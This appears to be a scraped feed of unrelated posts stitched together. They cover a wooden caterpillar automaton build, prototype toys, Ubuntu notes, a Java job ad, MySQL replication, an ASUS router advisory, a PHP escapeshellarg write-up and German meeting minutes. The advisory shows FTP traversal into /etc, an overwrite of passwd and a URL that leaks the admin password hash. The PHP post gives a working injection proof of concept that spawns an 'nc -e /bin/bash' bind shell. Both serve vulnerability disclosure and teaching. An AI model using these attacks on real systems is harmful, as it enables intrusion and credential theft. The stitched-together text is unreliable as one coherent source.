The cams were cut from 1 1/4 pine dowel on the miter saw and are exactly 1/2" wide. They need 1/4" holes through their face that go all the way through. I used a jig that I usually use to drill offset holes in wooden wheels. The center of the hole is 5/16" from the edge.

I used a pine dowel for these. One batch seemed to have rougher edges that splintered a bit but a lot of factors can go into that. They cleaned up fine.

The case for the caterpillar was made with 1x3 (3/4" by 2 1/2" actual) pine boards. The case was 8 1/2" long (8" is fine as well). The holes on the top piece need to be right down the center and I used a 9/32" bit to allow clearance for the 1/4 dowels that will be the followers. I drilled the hole for the head at 2" in from the end and the first hole for the body at 2 3/4". After that, it was 8 more holes each 1/2" from the last one. ( I finally got smart and set up a template for this.)

The front and back pieces were 3" tall. They have a 9/32" hole right through their very center and need to line up since the rod need to go through both holes.

Once the holes were done I glued one end to the front of the top and the other to the back of the bottom to make two "L" shaped pieces. I put a coat of beeswax and mineral oil on them but was careful not to get any on the surfaces that will need glue during final assembly.

The followers are 2 1/2" long pieces of 1/4" oak dowels (I needed to make 10 of these.) The base of the followers were little pine blocks I cut that were 1" long (left to right looking from the front of the finished toy), 1/2" tall (up and down) and about 7/16" thick (front to back.) They each have a 1/4" flat bottomed hole drilled in them about 1/4"deep (using a Forstner bit.) I found that drilling the holes on either end of the stick already cut for thickness and height and then cutting to length on the band saw was much safer than cutting it to final size and trying to drill the holes.

I glued the followers together with their bases and checked that they moved freely in the holes on the top of the case. I hit the holes with a rat tail file to make sure nothing was too tight.

I took a 10" or 12" piece of 1/4" oak dowel and did a quick test to see where I could start safely lining up the cams. I glued the first one in place and then it was just a matter of lining up the next cam so it was a little off line from the previous one but glued to each other. I had a 1/4" difference in the rotation for each one.) The less the difference, the smoother the action. When finished it looks like a screw. I did double up on the cams for the head. I matched them for this one. On the other one I just cut one dowel 1" thick instead of 1/2" and drilled the offset hole in it. The thin disk at the front is used to help lock the rod in place so it doesn't move too far back and forth once the crank is attached.

So then there is some test fitting to see where that locking disk needs to be placed to have the followers line up with the cams. By having the bases of the followers be a little less that 1/2" wide and the cams exactly 1/2" wide, it makes it run pretty smoothly. I hit a few of the "feet" of the followers on the beltsander once or twice just to give a little more room. Once I was happy with the alignment, I glued the locking disk in place and the top and the bottom together.

Now the the body...

I purchased a 1 1/4" diameter poplar dowel from the local old school hardware store. I used it for the 7 main body segments. I also cut one disk each from a 1 1/8" and a 1" dowel for segments toward the tail. Each segment needs to be just short of 1/2" thick. The poplar dowel splintered a lot less than the same sized pine dowel I used for the cams and had a smoother,denser end grain after it was cut and sanded.

I experimented with using my bad saw to cut the disks and I was very disappointed with the results. They weren't a total wreck but they required a fair amount of time on the belt sander to clean up and they were uneven. After a little slip cost me a part of a fingernail, I finally was like "Not worth it!" I cut a new set using my power miter saw with a stop block. Super easy and super precise. One note though...DO NOT lift the blade while it is still spinning! I spit three of those little disks across that shop at about Mach 4 before I learned that lesson.

The body segments need a 1/4" hole drilled in the center of their edge for the followers. I used the same jig as for the cams but turned up on its side. I used a Forstner bit (thank you once again Benjamin Forstner) to get a nice flat bottomed hole. I made the holes 3/8" deep. You could probably make this with 3/16 dowels but I find the birch dowels I get in that size to be pretty fragile. Your millage may vary.


I used a pre-turned craft store piece called a "doll's head" for the caterpillars head. (It is 35mm across, about 1 7/16"ish.) I plugged the hole of what would normally have been its base with a length of 3/16" dowel and then drilled a 1/4" hole for a follower to fit in. I used the same jig as with the other pieces and left the dowel long so I could use it as a handle while drilling. Once the hole for the follower was done, I trimmed the dowel flush and sanded that part flat.

The smart thing to do now is to test your body segments to make sure they don't rub against each other too much AND THEN paint and finish them even though they will be slightly thicker once painted. Just be sure to keep the segments in the same order you test fitted them. 1/16" one way of the other really makes a difference. You don't want too much wiggle room between the pieces though since it can allow the followers to get out of alignment and interfere with each other. Don't let this stress you out. It's a toy. Not the engine on an airplane. It will work fine.

So, with all the pieces cut and tested, I painted them and gave them a coat of spray acrylic. Yeah... it looked a little creepy but this setup let me paint the full disks and have them dry out of the way. Also let me use the spray acrylic on both sides at the same time. It was a big time saver.

One thing I added before the acrylic was a shapely rear end for the caterpillar. He just didn't look right with a round head and flat butt so I rounded off a 3/4" dowel, painted and glued it on to the 1" body segment. Now... baby got back!


Last thing in the crank. I used a 2" hole saw to cut a disk of 1/2" pine from a board, sanded it up and painted it to look like an orange. A little 1/4" dowel became the stem/handle for the crank. It goes in the 1/4" hole where the leaves are.

I tested the fit again and the glued the body pieces on to the followers. Almost done.
I trimmed the front and back of the rod and added the handle. I left a tiny bit over 1/2" of the rod protruding from the front to attach the crank on it. I made sure to leave a little space so it wasn't constantly hitting the case. I guess a washer is called for here, but I tend to stay away from metal in the toys if I can help it.

Okay then.. all set.


Crank
Head
The full critter


And here he is in action. I did the cams slightly different on this one with an extended cam in the tail (not needed) and a longer cam for the head that worked as the locking piece as well.


My guess is that most parents of the last 40 or so years are familiar with Eric Carle's "The Very Hungry Caterpillar." It's a great book and it has a very distinctive style. I could never match it but I figured I could capture the vibe by using some of the same colors and shapes.

People really like the pleasant wiggle and whimsical nature of this toy. It really has whet my appetite for simple automata. Stay tuned.
          My Island of Misfit (Prototype) Toys        
Charlie in the Box – “My name is all wrong. No child wants to play with a Charlie-In-The-Box, so I had to come here.”
Hermey – “Where's "here’

We're on the island of misfit toys…

Yes. His name is Hermey. Not Herbie. He was a gift from a friend last Christmas and now he hangs out and watches over my shop. True he turned his back on his toy making heritage to study dentistry but while you can take the elf out of the shop... you never can really take the shop out of the elf.

Speaking of my shop... I knew it was time to clean my shop when there was no place for my cat to sit when I was trying to work. I could see that he was getting quite frustrated at not being able to get in my way or use his "Purr-Rays" to hypnotize me into doing whatever he wants. In fact, it may have been his idea for me to start cleaning up.

For years I had been in the habit of holding on to every little scrap of wood or doo-dad I had worked on. In a bit of irony, now that I have a bunch of space for good stuff, I really don't have space for a bunch of junk. For the first time I could remember I started throwing stuff out or putting it into the "burn bucket" for our fire-pit.

But before I clean, let me digress....

The sources for my toys are pretty varied. I get an awful lot of plans from books and more than a few ideas off the interwebs. Sometimes they are a mix and match where I change a plan just a little to match my tastes/interests or to make it special for the person receiving the toy. Sometimes though, I just get an idea and tinker with it a bit and see where it takes me.

Ideas like the WW1 British and German tanks, this dump truck and the bomb sight were proofs of concept (proof of concepts?) that just kept going until I had a finished product. However, in cleaning up my space I was surprised at all the prototypes and near misses that I had held on to.

Which (finally) leads us to The Island of Misfit (Prototype) Toys.

I was surprised that I had held on to so many of these, but while some did head for the burn box, a lot of these went back on the shelf or in a box.

This bulldozer was  based on David Wakefield's idea in "How to Make Animated Toys"
I got distracted working how to make a little driver bounce up and down and never got back to finishing this. Blade was too clumsy anyway. Some day.

Torpedo launcher. When I was a kid my buddy Jack had this plastic naval play-set where torpedoes fired out of the subs.It was pretty cool and it was the inspiration for this. You push the torpedo down the bow tube and it pushes in a plunger that is then locked by upward pressure on the conning tower/periscope. (There is a spring at the rear of the plunger.) Once locked, just push down on the periscope and the torpedo launches. I turned the torpedo on a mini lathe and it would actually shoot several feet. It worked well but I didn't like burying working parts where I couldn't get at them if they needed to be fixed. Proportions are wrong as well unless I was building a mini-sub... hey....that's not a bad idea!

A tank turret where the main gun recoils thanks to a Sotch Yoke. Basically rotational motion is converted to linear motion. The neat thing is this should allow me to rotate the turret and the gun would reciprocate no matter which direction it faced. Pretty cool, huh? Actually needs to be built to a much higher tolerance and the turret would have to be pretty snug in its ring to prevent it from rotating by itself. Still, an idea that I should revisit.

Hard to tell from this picture.... but yes, I was working on a  Katyusha rocket launcher. For the non-History Channel types reading this, the Katyusha is a Soviet truck mounted rocket launcher used most famously in the Second War War (or... if any readers are actually coming from those Russian sites showing in my stats... The Great Patriotic War.) The idea was to pick up a $1 craft store truck and build a rocket launcher on it that really worked because for some reason it sounded exactly like something I would do. Tiny rubber bands provide the force. You pull back on the block, the little dowels retract, you let go of the block, the dowels fly forward and that sends little dowel rockets flying towards entrenched German invaders. Or not. It just didn't work very well. I can still build the truck though.

This one is hard to imagine but the idea is a sort of Gatling gun that shoots soda caps. You're looking part of the feed mechanism. Seriously. Caps fall down a tube, are pulled to the side, drop down and are fired. The feed pulls back grabs another cap and the cycle is repeated. Sorta worked but was going to be too big. I need to revisit it with realistic dimensions. Perhaps the world isn't ready for an automatic bottle cap launcher anyway.




Okay, now on to the Hall of Failed Ramp Walkers.

I love ramp walkers. They are neat gravity folk toys that are just amazing. These toys seem to walk down a ramp on their own. No batteries, springs or rubber bands. Just some physics and woodworking. Actually, they are hard to get just right. It is a mix of balance, friction, gravity etc that has to be just right or the toy will slide or stop walking half way down the ramp. I've managed to build two successful styles of ramp walkers. You can view the videos of a rhino unicorn and the kangaroo pictured on the left.

The Unicorn is based on Lou Ma's ramp walking rhino plan with some cosmetic changes. (That link leads to Dug North's amazing Automata Blog. You should check it out.)

I've actually made four of the kangaroos. The plans came from Wombat Morrison's Instructable. It is great plan. It works every time.

Anyway.... For the two that worked, there are four that didn't. Here was first ramp walker attempt; a duck. Somewhere I have a very poor quality cell phone video of it walking down a ramp. Since I had to tape assorted washers and nickles to it rear end to make it walk, I knew that it wasn't right. One of my daughters has a duck "thing" so I will get it right at some point.

I wanted to make the unicorn based on a horse but I couldn't find a pattern. I'd seen plastic ones that used to be used as cereal premiums but not a wood one. I gave this a shot to try and work out the mechanics. Needless to say... it didn't work.

So I decided that what  I need was a more flexible prototype model. Something I could try multiple variations on until I got it down right. So I tried this piece of modern day engineering and much to my surprise... it didn't work.

After I had built several kangaroos and the rhino, I got a better sense for how the ramp walkers need to work. I decided to try my hand at designing something from scratch. I applied all my new found expertise and put it into this prototype ramp walking gorilla and surprisingly enough... it didn't work. Close though... he will be revisited.

Last of the non-working ramp walkers is this bird based on one of Lou Ma's designs. I simply couldn't get it to work properly. I think he is salvageable but not a high priority. He (she?) has been spared from the burn bucket for the time being.






The entire time I was cleaning things, the cat was keeping tabs on me. As each little space was cleared, he'd claim it as his own and command me to do his bidding. I had no choice but to obey.

The last two prototypes are still under development. The first is a string climbing orangutan. Again, it is based on a Lou Ma idea but modified by me. This guy works, but not as smoothly as I would want. Arms are too angular to look natural but there is still hope for him. He'll  live on the Kennedy Assassination shelf for the time being.

And now, the latest prototype/proof of concept. I've seen plans for railroad hand truck toys where men on each side pump the handles up and down. Pretty cool but what if instead of people, it was penguins?!!! I know! Crazy cool huh? Got the idea from a grocery store display. Anyway, it works. I need to make convincing penguins and use the measurements I figured out on this to make a real one.



Teddy and Hermy supervised me through to the end. On the table under them you can see a partially completed frog who is actually on top of ANOTHER prototype piece: the Spinosaurus that I started five years ago and shelved.

In a perfect world, I would have closed this post with a picture of my clean shop but.... well it was clean for a day or two and then I re-clutterfied it. I guess it shows that I'm at least using the space... just saying.






          Ubuntu's Logo Spotted in The Big Bang Theory ... And What I've Been Up to Lately         
This is a quick account of my recent activities:

1.  I saw Ubuntu's logo in an episode of the show The Big Bang Theory.

That was on episode 17 of the 10th season.  Actor Kevin Sussman, who gives life to the character Stuart Bloom, is wearing a grey Ubuntu T-Shirt.




2.  I upgraded from Yakkety Yak to Zeisty Zappus.

The only time I attempted to upgrade an Ubuntu version was on my Chromebook, and it did not work.  Thus, I had my concerns when I did it on my ThinkPenguin Adelie laptop, which is the machine I take to work.  My fears proved unfounded, though: everything went perfectly!  Wow!

3.  I experimented with Debian on my Lenovo tablet.

I had tried GNURoot before and it went pretty well, but everything felt more like a proof of concept. Thus, I tried Debian noroot this time.  I still cannot get VLC to work, but Libreoffice does run smoothly, and that was one of my priorities.  I'll keep testing.
          Proof of Concept Funding        

Last updated: 11:47, Wed 29 Mar 2017 by Beck Lockwood

Compare with previous version


          Senior Java Software Engineer        
Senior Java Software Engineer - Computer programming

Our client is looking to recruit a Senior Java Software Engineer to help in the creation of innovative payment technologies that will revolutionaries the payments industry.

Forming part of one of their development teams and working closely with the team lead and the technical architects, you will be involved in the design, development, testing and maintenance of payment products as well as in the training and mentoring of junior team members. As part of the role, you will be required to keep up to date with latest trends and technologies, and see how these can be best used in our projects. If you are looking to work in a fun, challenging, fast-paced environment with ample opportunities for growth, this role might just be for you.

 
Responsibilities

  • Translate high level business requirements into system design within the existing system architecture
  • Ensure high quality in deliverables and continuous improvement within area of responsibility
  • Develop, test and maintain Java code as dictated by project requirements
  • Create and maintain software documentation
  • Work with and mentor junior team members
  • Construct Proof of Concepts and assess their viability
  • Evaluate and provide feedback on available and emerging technologies to determine the potential impacts and business value

Requirements:

  • A Computer Science degree or equivalent
  • 5+ years’ experience in an application development role, with proven track record of delivery
  • Demonstrated in depth expertise with Java, Java Frameworks, Spring, Hibernate, Object-Oriented design, and development principles
  • Moderate experience in building web applications using  HTML, CSS, JavaScript and  JavaScript frameworks, preferably AngularJS
  • Excellent personal organisation and ability to prioritise and carry out multiple tasks
  • Must be flexible and able to adapt to change in a fast-paced work environment
  • Working experience in Agile projects, preferably using Scrum/XP practices
  • Demonstrated ability to balance scope and quality against time to market in a minimum viable product whilst working towards the right level quality in the final product
    Job type:
    Full-time
    Salary notes: depends on Experience

          MySQL Multi-Master – Single-Slave – Replication (Episode 2)        
Introduction

One of the features that make MySQL so great is its easy replication set-up. If you are experienced and know-how to do it, it takes you about 15 minutes to set-up a slave. What you have in the end is a replication from one master to one or several slaves. So you can build a top-down data stream pyramid and spread your data on many slaves.


From time to time some customers are asking for the other way: Many masters replicating to one slave (which is also called multi-source replication). For this requirement MySQL replication cannot help you directly.

Possibilities

You can circumvent this situation in the following ways:

  1. Implement your own data transfer mechanism.

  2. Use this ugly hack I have written down 2 years ago: Multi-Master-Single-Slave-Replication

  3. Test the approach described in the following article.

  4. Wait until MySQL has implemented it...


Possibility number 4 for would be the nicest one. Because then the solution would be properly supported by your database vendor and you do not have to take care much about problems, as long as you have a support contract.

When we look at the MySQL work log and search for replication we find a work log entry with the title: WL#1697: Multi-source replication. But for whatever reason it has the following status: Affects: Server-7.0 — Status: On-Hold — Priority: Low. :-(

What can we do now:
a) Resign.
b) Become an important customer (by paying much money), complain about the priority and if nothing changes escalate it to the top management of MySQL.
c) Find many many other fellow sufferers, unite and make your database vendors management aware of your desire.
d) Help yourself (it is eventually an Open Source product...).

Possibilities number 1 to 3 from above are some kind of Help yourself.

Help yourself

Because I am not a programmer and I have no clue about programming, possibility number 1 is out of question for me. But I am sure there are many other MySQL users out there in the world which would appreciate your effort.
Possibility number 2 is a quick and ugly hack but may work in some situations.
And number 3 I was pointed to by a user called Kwame who wrote me an email (thanks Kwame for the cool hint!).

A possible solution

One and a half year ago I wrote down a little article about MySQL Active - Active Clustering" because we had ever and ever customer asking for a replacement for a well known but very expensive product from an other big database vendor.
Peter Zaitsev was not very happy with the content of it: MySQL MyISAM Active Active Clustering - looking for trouble?. But comments about the critics already gave a sign for the solution: When you combine the MySQL Active-Active Clustering with MySQL replication you can finally get a many-master single slave replication!

So what I did was the following:

I have 3 servers which act as a master and on the 4th server I install 3 MySQL instances (mysqld) running on the same datadir. Please make sure, that you replicate ONLY ONE SCHEMA per master slave pair!


As configuration file for my slaves I have used something like this:

#
# my.cnf
#

[mysqld]

port = 3308
socket = /home/mysql/tmp/mysql-3308.sock
pid-file = /home/mysql/data/mysqld5127/mysql-3308.pid
datadir = /home/mysql/data/mysqld5127

skip-innodb
external-locking
log-error = /home/mysql/data/mysqld5127/error_4.log

server_id = 4
master-info-file = /home/mysql/data/mysqld5127/master.info
relay-log = /home/mysql/data/mysqld5127/mysql-3308-relay-bin
relay-log-index = /home/mysql/data/mysqld5127/mysql-3308-relay-bin
relay-log-info-file = /home/mysql/data/mysqld5127/relay-log.info

Requirements

Make sure that:

  • You only write to one schema per master (schema_a in master 1, schema_b in master 2 and so on...)

  • You comply with all the requirements described in the document MySQL Active - Active Clustering

  • You flush the tables on ALL slave before reading.


Very simple first tests showed, that it is possible to "aggregate" the data from many masters into a single slave. But please verify this proof of concept very carefully before you deploy it to your productive system with your real data. This approach is neither recommended nor supported by MySQL.

Drawback

A further replication from this slave system to other slaves is not possible (or at least no feasible solution comes to my mind) except you use MySQL cluster as "aggregator". Then it could be possible...
          Multiple vulnerabilities affecting several ASUS Routers        
Written by Eldar Marcussen

Affected Vendor: ASUS http://www.asus.com/au/Networking/Wireless-Routers-Products/
Affected Device: Multiple - including: RT-AC3200
Affected Version: Multiple - including: 3.0.0.4.378_7838
Issue type: Multiple Vulnerabilities
Release Date: 14 Apr 2016
Discovered by: T.J. Acton
Issue status: Vendor patch available at
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router 

Summary

ASUS produces a suite of mid to high-end consumer-grade routers. The RT-AC3200 is confirmed to be affected, and the following devices are assumed to be affected:
TM-AC1900
RT-AC3200
RT-AC87U
RT-AC68U
RT-AC68P
RT-AC68R
RT-AC68W
RT-AC66R
RT-AC66W
RT-AC66U
RT-AC56U
RT-AC51U
RT-N18U
1. Insecure default configuration for the Anonymous FTP user account

Description

The affected ASUS routers suffer from insecure default configuration for Anonymous users, once anonymous access in enabled. Write access is enabled for all directories in the attached storage by default. Furthermore, the administrator is not able to restrict read or write access for any specific directories on attached storage devices.

Impact

The anonymous FTP user can write arbitrary files to the attached storage device.

2. FTP users can access certain system files when Download Master is installed

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to gain limited access to certain system files and directories when Download Master is installed.

Impact

The attacker can read certain system files via FTP.

3. FTP users can read all system files, and retrieve an unsalted root password hash, when Download Master is installed

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to access all system files and directories, including /etc. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.

Legend:
Condition A: When Download Master is installed
Condition B: When read access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When read access for the ASUSWARE.ARM USB directory has been granted to the current FTP user


UserConditions
AnonymousFTP User AccountsCondition ACondition BCondition C
xxx
xxx

Impact

The attacker gains access to all system files, including /etc/passwd. Exposure of unsalted MD5 lighthttpd password hash, which is automatically created by copying the root user’s credentials for SSH / Administrative Interface access

Proof of concept

A complete PoC exploit script will be released after public disclosure. The script leverages an anonymous user account, or a valid FTP user account, retrieves and cracks the root password hash, and attempts to spawn an SSH shell in the context of the root user.

$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 Welcome to ASUS RT-AC3200 FTP service.
Name (192.168.1.1:acton): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> cd /../opt
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||19683|)
150 Here comes the directory listing.
lrwxrwxrwx 1 0 0 39 Jan 06 12:58 asusware.arm -> /tmp/mnt/sda1/asusware.arm/asusware.arm
drwxr-xr-x 2 0 0 860 Jan 06 12:58 bin
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 etc -> /tmp/mnt/sda1/asusware.arm/etc
lrwxrwxrwx 1 0 0 34 Jan 06 12:58 include -> /tmp/mnt/sda1/asusware.arm/include
lrwxrwxrwx 1 0 0 31 Jan 06 12:58 info -> /tmp/mnt/sda1/asusware.arm/info
drwxr-xr-x 2 0 0 2860 Jan 06 12:58 lib
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 man -> /tmp/mnt/sda1/asusware.arm/man
lrwxrwxrwx 1 0 0 31 Jan 06 12:58 sbin -> /tmp/mnt/sda1/asusware.arm/sbin
lrwxrwxrwx 1 0 0 32 Jan 06 12:58 share -> /tmp/mnt/sda1/asusware.arm/share
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 tmp -> /tmp/mnt/sda1/asusware.arm/tmp
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 usr -> /tmp/mnt/sda1/asusware.arm/usr
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx 1 0 0 11269 Jul 22 2013 asus_lighttpd.conf
-rwxrwxrwx 1 0 0 39 Feb 18 2014 asus_lighttpdpassword
-rwxrwxrwx 1 0 0 3264 Oct 25 2012 asus_modules.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_script
drwxrwxrwx 1 0 0 4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx 1 0 0 40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx 1 0 0 36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx 1 0 0 97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx 1 0 0 156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx 1 0 0 0 Jan 05 12:15 hello.html
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 init.d
-rwxrwxrwx 1 0 0 263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx 1 0 0 214 Jan 06 14:09 passwd
-rwxrwxrwx 1 0 0 23 Jan 05 12:20 test.sh
226 Directory send OK.

FTP users can overwrite arbitrary system files

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to overwrite arbitrary files, including system files. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.

Legend:
Condition A: When Download Master is installed
Condition B: When write access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When write access for the ASUSWARE.ARM USB directory has been granted to the current FTP user
UserConditions
AnonymousFTP User AccountsCondition ACondition BCondition C
xxx
xxx

Impact

The attacker gains write privileges to all system files, including /etc/passwd and /etc/shadow.

Proof of concept

ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx 1 0 0 11269 Jul 22 2013 asus_lighttpd.conf
-rwxrwxrwx 1 0 0 39 Feb 18 2014 asus_lighttpdpassword
-rwxrwxrwx 1 0 0 3264 Oct 25 2012 asus_modules.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_script
drwxrwxrwx 1 0 0 4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx 1 0 0 40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx 1 0 0 36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx 1 0 0 97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx 1 0 0 156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx 1 0 0 0 Jan 05 12:15 hello.html
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 init.d
-rwxrwxrwx 1 0 0 263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx 1 0 0 214 Jan 06 14:09 passwd
-rwxrwxrwx 1 0 0 23 Jan 05 12:20 test.sh
226 Directory send OK.
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||41235|)
150 Ok to send data.
100% |*************************************************************************************************************************************| 214 283.94 KiB/s 00:00 ETA
226 File receive OK.
214 bytes sent in 00:00 (60.83 KiB/s)

Sensitive file disclosure in AiCloud’s AiDisk server

Description

AiCloud suffers from sensitive file exposure. Authenticated users are able to access sensitive files, including password and configuration files, via a directory traversal bug in AiCloud’s AiDisk server.
This vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure. Note: unauthenticated users can exploit this issue whilst impersonating an administrative user via TJA-ASUS-06)

Impact

Attackers can access sensitive files.

Proof of concept

https://192.168.1.1/RT-AC3200/sda1%2fasusware.arm/etc%2fasus_lighttpdpassword

Session management flaw in AiCloud

Description

AiCloud suffers from a session management flaw. If the attacker has the same external network (or is on the same local network), they can spoof their User-Agent to match the admin’s User-Agent, and by doing so impersonate the Admin user. This is only possible while the Admin has an active session. Note: This vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure, as per issue TJA-ASUS-05

Impact

Attackers can access sensitive files.

Sensitive information disclosure in MiniDLNA server

Description

The MiniDLNA server on port 8200 suffers from a remote, unauthenticated sensitive information disclosure. Exposed information includes: details of all clients (including: internal IP address, MAC address, and device type), and file type statistics for attached storage devices.

Impact

Attackers can access sensitive information remotely, without authentication.

Proof of concept

http://[IP/HOST]:8200

MiniDLNA status

Media library

Audio files 347
Video files 0
Image files 6

Connected clients

ID Type IP Address HW Address Connections
0 Samsung Series [CDEF] 192.168.1.99 48:5A:3F:6D:02:A4 0
1 Unknown 192.168.1.55 78:31:C1:CD:11:63 0

0 connections currently open

Solution

Apply the patch available for download from vendor at the following address:
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router/

Response timeline

07/01/2016 - Vendor contacted
22/03/2016 - Patch available.
26/03/2016 - Advisory released.

          Security issues with Using PHP's Escapeshellarg        

PHP Escapeshellarg
Written by Eldar Marcussen, Cyber Security Consultant
Using user supplied data on the command line is traditionally a security disaster waiting to happen. In an infinite universe there are however times when you might need to do just that. You will be glad to know that PHP provides two functions to aid you with security in those situations:escapeshellcmd and escapeshellarg.

The PHP documentation defines these functions as:


·         escapeshellcmd() escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. This function should be used to make sure that any data coming from user input is escaped before this data is passed to the exec() or system() functions, or to the backtick operator. Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.

·         escapeshellarg() adds single quotes around a string and quotes/escapes any existing single quotes allowing you to pass a string directly to a shell function and having it be treated as a single safe argument. This function should be used to escape individual arguments to shell functions coming from user input. The shell functions include exec(), system() and the backtick operator.

There are some caveats around the use of these functions which the documentation doesn't cover, command line switches inside single quotes are still treated as command line switches. For example: ls '--help' will print the help text for the ls command. Thus it may be possible to inject data to alter the intended execution, typically referred to as command injection. In order to illustrate this bug I have created a simple proof of concept script which will spawn a bind shell on port 4444 by diverting the execution of tar with command line switches:

<?php
# PoC exploit of php not escaping dash characters in escapeshellarg/cmd
# Reference: http://php.net/manual/en/function.escapeshellarg.php
# Written by Eldar "Wireghoul" Marcussen

# Create a malicious file:

$fh fopen('myfile.png''w');
fwrite($fh"<?php system('nc -lvp 4444 -e /bin/bash'); echo 'WINRAR!'; ?>");
fclose($fh);

# I choose to use php here, you could use whatever binary you like

$safe_opts escapeshellarg('--use-compress-program=php');
$safe_file escapeshellarg('myfile.png'); # Really a php script with a .png extension
system("tar $safe_opts -cf export.tar $safe_file");
?>

The response from the PHP security team is that this is expected behavior, and that it is not possible to protect programs that use parameters in unsafe ways. While I understand their point of view, I still feel that the documentation does not clearly highlight the potential risk around usingescapeshellarg. And if you are doing source code reviews I would take a closer look at any operation which relies on escapeshellarg to sanitise user supplied inputs.
          Protokoll der Lenkungsausschussitzung vom 25.04.2007        
Herr Dr. Turowski musste wegen einer Dienstreise der Sitzung fernbleiben.

Erstmalig sind Herr Dr. Peter Holleczek und Daniel de West als Kundenvertreter sowie Herr Dr. Peter Rygus vertreten.

1.Projektsituation Novell - RRZE

Herr Dr. Hergenröder führte einleitend aus, dass das Projektbudget mit 260.000 Euro entsprechend 180 Beratungstagen fix ist. Derzeit sind 48% dieses Budgets verbraucht, was bedeutet, dass die Mittel die für das Jahr 2006 eingeplant waren in den ersten 6 Projektmonaten verbraucht wurden. Außerdem ist absehbar, dass das Beratungsbudget über die gesamte Projektlaufzeit knapp wird. Er stellt daher die Frage in den Raum, wie die bereit stehenden Mittel effizienter als bisher eingesetzt werden können?

Außerdem wurde die Frage aufgeworfen, welche Refinanzierungsmöglichkeiten für das Projekt bestehen? Hier spielt vor allem die Möglichkeit über die Verrechnung der Projektergebnisse mit anderen Hochschulen in Bayern (Novell.IDM@Bayern) die Kosten für das RRZE zu senken?

Laut Herrn Lippert wird zukünftig verstärkt darauf zu achten sein, welche Aufgaben durch Novell Mitarbeiter im Gegensatz zu RRZE-MA auf Grund ihrer Erfahrung effizienter zu erledigen sind. Außerdem sind die Aufgaben die evtl. zurück zustellen sind zu identifizieren.

Herr Adam denkt an eine Kostenübernahme durch andere Universitäten (PA, WÜ) in Bayern.

Er stellt sich vor, dass im Rahmen des Projekt eine Standardkonfiguration auf der Basis eines gemeinsamen Prozessmodells erstellt wird. Hierbei möchte sich Novell auf die liefernden Systeme konzentrieren. Er empfiehlt die homogene Systeme zu identifizieren und beispielhafte Anbindung zu realisieren. Dabei ist ein einheitliches Prozessmodell wesentliche Grundlage.

Herr Eggers weist darauf hin, dass genau dies die Zielsetzung des Konzepts Novell.IDM@Bayern ist. Er sieht jedoch eher die Ziel- denn die Quellsysteme im Fokus da die Ähnlichkeiten eher bei letzteren liegen.

Desweiteren berichtet er vom Arbeitstreffen vom 27.03.2007 in Nürnberg bei dem deutlich wurde, dass die Kolleginnen und Kollegen einen proof of concept der Erlanger Lösung fordern. Dies sei wesentliche Voraussetzung für spätere Übernahme durch andere Universitäten.

